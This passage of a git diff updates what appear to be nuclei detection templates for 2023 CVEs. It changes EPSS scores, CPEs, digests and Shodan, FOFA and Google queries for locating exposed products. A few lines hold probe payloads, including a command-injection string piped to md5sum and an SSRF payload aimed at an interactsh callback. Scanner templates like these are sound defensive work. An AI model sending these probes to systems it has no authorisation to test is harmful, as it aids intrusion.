fofa-query: body=/wp-content/plugins/stock-ticker/ + publicwww-query: /wp-content/plugins/stock-ticker/ tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic http: @@ -55,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042548140cbcebc9b51e355d4673028e53db18e5e157b176796ea8abb79e5dc7902205f298d4225c8d922ae3c4a9a5f23956880fed673540ded1004b53276128d20d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220056d69daada66633276ae37f2d2c9c36013ba0f1d18e7e240f40fd6db47a15b1022100878f118a3ebe1a847cf47ff121b388b4fc0c454c9138b800f184f6d752c5b206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 15ebb9b3ec..cd97e25471 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.00587 - epss-percentile: 0.77728 + epss-percentile: 0.78117 cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: axigen product: axigen_mobile_webmail shodan-query: http.favicon.hash:-1247684400 + fofa-query: icon_hash=-1247684400 tags: cve,cve2023,xss,axigen,webmail http: @@ -48,4 +49,4 @@ http: - 'contains(response, "Axigen")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502210089d5aa0ce825695bb9ea5e7f7d0ed99275c71b68c467bbc2b7a3f5731ea21a6b0220691c6922540b2937f29bd4712cd7da837b1c42e3305b9aeabc102b8b17c9005d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201711e917883974fc1055e22022c081d81aefb637222322fc595cf91d992c05b8022100b25c9d8d083dc86f817080e290fe7dd21bbeec43c59b4fb98ba9724d52857b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 02e680a862..27aec1af7d 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -15,15 +15,19 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40779 cwe-id: CWE-601 - epss-score: 0.00869 - epss-percentile: 0.8059 + epss-score: 0.06641 + epss-percentile: 0.93801 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewarp product: deep_castle_g2 - shodan-query: title:"IceWarp" + shodan-query: + - title:"IceWarp" + - http.title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,icewarp,redirect http: @@ -41,4 +45,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502205688139ac072aa9cc722af60b180b98debd637c0905e2151de237b1f47ef1fe5022100e935f1d54586ab3c5b62921b0477047bc653ee866a09fae50f38de108caec714:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030c7ded8a24db2f131af13a37bca3b80726fabd37cee41f01b6d1488fab6cefe02202e9547ec28444e0231b9920f6483b5f311816f96778a3aa1a0f4539e9b1884b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index 2c5df20248..362f05240d 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4110 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Booking", "Arrival", ">")' condition: and -# digest: 4a0a00473045022100dd5abe7b4ecc19617163506032de3f314ba51740ebceebacbe16cca232327bd1022068118d6d2da41b0d087107dd4c56af59e7c93d834106bd2a0e5d2e3e3c64ecfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011f3ef24c41dbb0af2002b9e94af8e13843e80882af1ad261dd9824d612d5996022100d4efe87afa3e996a33be585e48d069e66c01b0e75805473390a91fd7af811806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 16369ce31e..355c1c497b 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41109 cwe-id: CWE-78 - epss-score: 0.23094 - epss-percentile: 0.96433 - cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:* + epss-score: 0.33157 + epss-percentile: 0.97044 + cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: patton - product: smartnode_sn200_firmware + product: smartnode_sn200 tags: cve,cve2023,smartnode,voip,patton variables: payload: "echo CVE-2023-41109 | md5sum" @@ -47,4 +47,4 @@ http: part: body words: - "dd556350275e2ee0a2e877cea9c8a74a" -# digest: 4a0a0047304502202bfc9da42e19e2e2ee3b4774db0a0deed67a87e5115c8868e175566429724498022100ef5913fc5f59bb9dbf437ebb76d6ec44d1e3fff82794bf190909f9e6acd3ec98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100957697fedc1e8c0e72418b4a7ff9772edd859418f1b322713e3e6054d20c362d022100ecc7504e92125a1f7a4a4e533b58833d07d6e312f31036b0938734535c480fbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 1404f4d807..70da6f403e 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4111 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c72e388d83be779eae11d3636afc409495de936dfa859dff8ff69d9e4dd4a15802207594bec3402c8d72da7fc37222348df75178687c59732812c7b893921365a518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a952678ae86dae9a2000d260905d980dbf78991bd59b1171724367b6498ceeec022100f953232b2e97fbcd222f2a7a5883a0cefb7cb6f897e9402226c706967bcfded3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index b11311ac6a..64fbd7a8c2 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -18,14 +18,17 @@ info: cve-id: CVE-2023-4112 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60385 + epss-percentile: 0.61041 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: phpjabbers product: shuttle_booking_software - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" + fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers http: @@ -40,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a00463044022018c2cd802d511a3ec6b3a5e13a8ef5069df64208c7bd9f7ef8fe07e54510f4ef02206d9261b2d4c426dea6831bab220898c4613025136f1f8bed4cdba7e34beb8f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f292e466e458da63a1ca2e01795aa6c7f535d773f3c384a3d25cd1fae8c3ddfb02210095957e0f35bea7d57513d789df742020893ea3bd7d05a05389520bc4e9c75dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 4259c76310..806c3959f8 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4113 cwe-id: CWE-79 - epss-score: 0.00263 - epss-percentile: 0.63974 + epss-score: 0.0027 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Select Service(s)", ">")' condition: and -# digest: 4b0a0048304602210081a78e8845024d25eab47ddc2ea3b7ce21b4868e8bcd8751b905575ab1a1cce2022100bc0e77f12b39336c4e7b2bfc219d37a5fa9ba58f44352aefca12decceb34a147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf132073217cb77de7ed0548b509ed876572eeb7fecd5f659a6276eed21735f502210097ddeb29ce9316744ce029231b514e03212f2d972b0e296cbf64cb18cb3b4e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 3e9c7c1f58..a10231e6fa 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4114 cwe-id: CWE-79 - epss-score: 0.0039 - epss-percentile: 0.70599 + epss-score: 0.00401 + epss-percentile: 0.73538 cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' condition: and -# digest: 490a004630440220404eff835027749f25ade1644a56cf1698eb2c6a9ad6553068c61c6023e9bae40220384c63acecfb509a720f108a0c47a0f553107ff614841960525380056c907818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080ac094c8bac706dec5b9aaff33fe5b1cf5d440c38e72ab153ae179d8609d7dc022100e03c8ef4d271818cf34d18719585e2c6413a277b292cf0309ff69978514a86b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index dc51e7ef73..8abad65a7b 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", ">")' condition: and -# digest: 490a00463044022034beeb12d66272799e9718ec924c454b445020129f3be7e51f27cac48824a99902201586952e2c5671c95203f1e81868eae762c7450bc1aec0dea74dd5bccdd96ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a9ee27d504cde8dfc06a47e8d49fdf63ee33e9e6654e290898db2ae143bb3f20220160f64074ef588bae2217521f1d5912cab6373816198afa00a65ed10717aca8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 30a2089b12..e616b38467 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -18,14 +18,17 @@ info: cve-id: CVE-2023-4116 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: phpjabbers product: taxi_booking_script - shodan-query: html:"PHP Jabbers.com" + shodan-query: + - html:"PHP Jabbers.com" + - http.html:"php jabbers.com" + fofa-query: body="php jabbers.com" tags: cve,cve2023,packetstorm,xss,phpjabbers http: @@ -40,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and -# digest: 490a00463044022014e56b9021d2442982b86a1d21892f238398d218d593b939cf613c4485737f8802205ae68c8fd53c1b5048efba29b99e73f220fdcdc2b85dbdfb6c4418e942d82d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c1f36c601fc8963fc32e00b4fdb8e8a6269b00d3f59e5dd8216ecf1ae06de4d022100a7e5be57de477a7cdb02508af120769b1fa8caa60d40df44ba59630a533f97e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 19d98c6f12..f83527d736 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -17,15 +17,25 @@ info: cvss-score: 9.9 cve-id: CVE-2023-41265 cwe-id: CWE-444 - epss-score: 0.8352 - epss-percentile: 0.9837 + epss-score: 0.91412 + epss-percentile: 0.98873 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: max-request: 1 vendor: qlik product: qlik_sense framework: windows - shodan-query: html:"Qlik" + shodan-query: + - html:"Qlik" + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" + google-query: intitle:"qlik-sense" tags: cve2023,cve,kev,qlik,smuggling,windows http: @@ -48,4 +58,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(header, 'Bad Request') condition: and -# digest: 4b0a00483046022100df63da243752a7c8ae5b4419c6c0bc3d012438f3aad942de819106d8d7dcad6d022100869cb12653434026c70d72cf0b96cc8bded65bf24f15d64149a11ca8a0ad02f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200fd96b61a99a99ef4072c41f731c2d128cdb00619b68342fb25b5805f10cda0c0221008c74aa87747eb04a6771f88163304b3510220dccc8c60b5fe5ce40388c9cfbc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 5dfc6e1109..7dd9722ae9 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-41266 cwe-id: CWE-20 - epss-score: 0.83414 - epss-percentile: 0.98363 + epss-score: 0.86555 + epss-percentile: 0.98585 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: verified: true @@ -25,7 +25,16 @@ info: vendor: qlik product: qlik_sense framework: windows - shodan-query: http.favicon.hash:-74348711 + shodan-query: + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" + google-query: intitle:"qlik-sense" tags: cve2023,cve,qlik,traversal,kev,windows http: @@ -43,4 +52,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(body, 'The comparison expression does not consist of three elements') condition: and -# digest: 4a0a004730450220566ec421ad7c50d5c1ea0f5fc891bbfc4415f305269b368b4415cf400032ab73022100f632ad54d2e5af16208befc75b62c9847e5d9a1fc9fcf40f2f293b0f48e4e243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d28967c1386ea69f0f40305e3d7ad2ff52a9dddf10ab9149f4231d06e4ea1166022056accbcd5aa55ffdfcde7bd666ffa7bb5f0eca6db1d05a2ac7c82f7458311a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index d0825f4029..647348cb75 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4148 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: metaphorcreations product: ditty framework: wordpress + shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ + fofa-query: body=/wp-content/plugins/ditty-news-ticker/ publicwww-query: /wp-content/plugins/ditty-news-ticker/ tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations @@ -46,4 +48,4 @@ http: - 'contains(body_2, "") && contains(body_2, "ditty")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a0047304502200c8125e1b2756d93127dccae80839b4c8c96616d63a000b81bf2b9f2032630910221008845ebdd0ea5cac9c9e9384d760e14af1ad449f31e8be0386857c03cc18433dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c515dc77b4cc4aa9f91298fc8d13c42df8117c4f8d63c6e62d3002ca0576a6e80221009dcdddaf6f1074a6cc16ea30e388f2677769dd9d6b38cc02694849c16a146974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 7779956df0..15f2253e2c 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -9,13 +9,16 @@ info: reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 - https://nvd.nist.gov/vuln/detail/CVE-2023-41538 + - https://github.com/2lambda123/Windows10Exploits + - https://github.com/codeb0ss/CVE-2023-41538-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-41538 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.4345 + epss-score: 0.00106 + epss-percentile: 0.43265 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true @@ -36,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "New Question", ">")' condition: and -# digest: 4a0a004730450220573b221f96c005a1ce69b11406267e60cf2fbe090ed4f46ff8e7bb16998e44aa022100fa56d9f414f55ccace60412ec5cac4c7ddf27c165a80761b51be1ead05e38e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002b9e872ab843ef7e6c81bd5a514ceeabce0a6488e8033a2e883c53539c8cddf02205c03b386c06890d214ae90d4f79d189025d15d7ffa668ad74119ff5d23491d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 2fc3ac93a3..f786b71686 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-41642 cwe-id: CWE-79 - epss-score: 0.00062 - epss-percentile: 0.24611 + epss-score: 0.00069 + epss-percentile: 0.29886 cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 @@ -53,4 +53,4 @@ http: part: header_2 words: - text/html -# digest: 490a0046304402201643b88d733d26e6806782978b52461d265bd0abf68328a30b05fe8912612357022038b9d82a8da8c11ea5f55e5723d733d3456e6ca29780cab4460c3e48805fd639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200655a96e735e87963a7690ba044aa123f88b06fa70877f5c00d977959a5c094002200a7012dcc63dac74f65fb63e04cf69e68a5c0c1c5f6bd6d179f64140d1d90f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index fc4b94187b..be08a55d80 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.12454 - epss-percentile: 0.95296 + epss-score: 0.09433 + epss-percentile: 0.94715 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' condition: and -# digest: 4b0a00483046022100a28b3fde66ec316e5d35e1bf44412d58add66c90225ea0a9fa425fc2828d6f47022100907ceb1d8aa34797e99ee9cc6bc997a324aecc9e2dfd80ee8824de4f81b07ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a134453e2464f93bf132fd8db6c09f27613be39ba4c0aaef68337bd060407ff0221009c766e234ab5de0d38872d51aaf73fb6396249477d8cfef7840159bba28559dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index ee8a50c97c..b748dfe238 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -17,13 +17,14 @@ info: cvss-score: 8.8 cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.00938 - epss-percentile: 0.82702 + epss-score: 0.0131 + epss-percentile: 0.85907 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijie product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router,intrusive variables: @@ -55,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205bfba5a589782be2d0036f90503b330fe659ef02b9af5ab8b2f27c84808f9788022074a92f73d65317b9a41a584965fdb4453c17e7ac9d0ae54eb460d3ceff37c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 75913b4766..e3538f906f 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -21,15 +21,19 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4173 cwe-id: CWE-79 - epss-score: 0.00226 - epss-percentile: 0.60816 + epss-score: 0.00189 + epss-percentile: 0.56249 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moostore - fofa-query: mooSocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: + - mooSocial + - moosocial + - icon_hash="702863115" tags: cve2023,cve,packetstorm,moosocial,xss http: @@ -54,4 +58,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100aabc5f4a70666c4149f432645c3b9306de4ad4d670a3c80bbd3419cdeaeecc17022100ed6b3b25edee45a8c93e2996d53d2cda7209d5cee5c38864ca5ec841b526cda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022023cad3861adbf0bc6237e47f9f8191aeb6e2ecf983e5056216df00cb97e884ce022100be49e1f8630f7ac7b0023eb9bfa3f09d97b93f4edae687f5b9dd9c2bc2f05fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 23a28e5c27..d4a6775564 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -21,15 +21,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4174 cwe-id: CWE-79 - epss-score: 0.00352 - epss-percentile: 0.71356 + epss-score: 0.00302 + epss-percentile: 0.69562 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: moosocial product: moostore - fofa-query: icon_hash="702863115" + shodan-query: http.favicon.hash:"702863115" + fofa-query: + - icon_hash="702863115" + - moosocial tags: cve,cve2023,packetstorm,moosocial,xss http: @@ -56,4 +59,4 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100c2f79dc8a421606bbe12a26b6bcd3651ce312cbeee353eb0058182d1b3926db2022100c22097f0aa51802f172b8c79656b3931df3f2aa0d30b5e94c42bb6c2ff02f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100982e4b04752783b0200c9e3387496ebf4cda655ed340987b6716d6c6b82cd8e502210097432437c8730b721768f5d5c3a6f5ff991556d4ea5e49f4af55e57a2e72d9eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index d4de9d38ba..337e85cf20 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -16,16 +16,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-41763 - epss-score: 0.05631 - epss-percentile: 0.93128 + epss-score: 0.04783 + epss-percentile: 0.92691 cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: microsoft product: skype_for_business_server - shodan-query: html:"Skype for Business" - tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev + shodan-query: + - html:"Skype for Business" + - http.html:"skype for business" + fofa-query: body="skype for business" + tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" @@ -46,4 +49,4 @@ http: part: body words: - 'Skype' -# digest: 4a0a0047304502204d385a1c2eabf2010aab8e2dc414636c821517c645d7f7454d930d398747d67b022100cd62b6a6ce39bd5762d8089f31dc55530c0182275b0fdc256b5ed3300e53e4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d30c98fd761c1575f50adc66b24f054a599a93be7fb3fcd37811c8be3983fdf80220255a844b0f065ce472e8ee890271dd701b61ee378e1fb86b6dd45a1c2f5dca4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 188fc5cdc2..e665e96b11 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -18,15 +18,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41892 cwe-id: CWE-94 - epss-score: 0.87963 - epss-percentile: 0.98425 + epss-score: 0.8421 + epss-percentile: 0.98494 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: craftcms product: craft_cms - shodan-query: http.favicon.hash:-47932290 + shodan-query: + - http.favicon.hash:-47932290 + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:craftcms + fofa-query: + - icon_hash=-47932290 + - body=craftcms publicwww-query: "craftcms" tags: cve2023,cve,rce,unauth,craftcms @@ -47,4 +53,4 @@ http: - "CraftCMS" condition: and case-insensitive: true -# digest: 4b0a00483046022100bef16c09352bcddedd249be504eae14354554e288442e838bc5ceefa5149a6370221009480bd063880d15392df84fc7d6c7d256677d9ddb190425ccf319ab5b64c1716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032305cd530842d67b635ec10e385f6424a8e71b9babad091d0d16238d501654102207426ea893d05841ab2e149c76f9a759040d2c58acb3a2a4e6c47285acbfe3f1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 2af71c7c71..0430e4f10a 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -14,7 +14,14 @@ info: metadata: verified: true max-request: 1 - shodan-query: "/opencms/" + shodan-query: + - "/opencms/" 